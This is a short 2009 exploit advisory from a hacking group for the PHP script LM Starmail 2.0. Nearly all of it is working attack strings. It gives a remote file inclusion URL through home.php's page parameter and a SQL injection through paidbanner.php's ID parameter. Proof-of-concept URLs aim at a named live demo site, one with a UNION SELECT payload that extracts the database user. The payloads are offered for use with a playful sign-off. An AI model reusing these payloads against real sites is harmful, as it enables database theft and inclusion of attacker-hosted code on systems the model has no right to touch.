Home / os / win10

lmstarmail-sqlrfi.txt

Posted on 06 August 2009

_______ ___________ _ ___ __\_ _____/ / /_ \ / /| __) \_/ > < | \n\_____ /__/\_ \___ / / / / #ruling the web since 9/2008 [=] LM Starmail 2.0 (home.php & paidbanner.php) SQL Injection/File Inclusion Vuln Vendor : http://www.script-shop24.de Script : LM Starmail 2.0 Download : http://www.script-shop24.de/product_info.php/info/p68_Starmail-2-0-Paidmail.html Author : int_main(); Contact : someone[at]jabber.ccc.de Site : 0xFEE1DEAD.de Greez : BrainWash,Thunderbird,STEAL,The Papst,eddy14,MagicFridge,Patrick B,Hero,tmh,Lorenz,iNs,Cod1K Exploit: http://[target]/home.php?page=[evilscript] http://[target]/paidbanner.php?ID=[sql] POC: http://script-demo.eu/Luxusmailer5/home.php?page=http://google.de http://script-demo.eu/Luxusmailer5/paidbanner.php?ID=-1+union+select+1,2,3,4,5,user(),7,8,9,10-- (File access is unfortunately disabled in this case, otherwise, this inclusion would work because of the coding gap.) Have phun, wui! [=]

 

TOP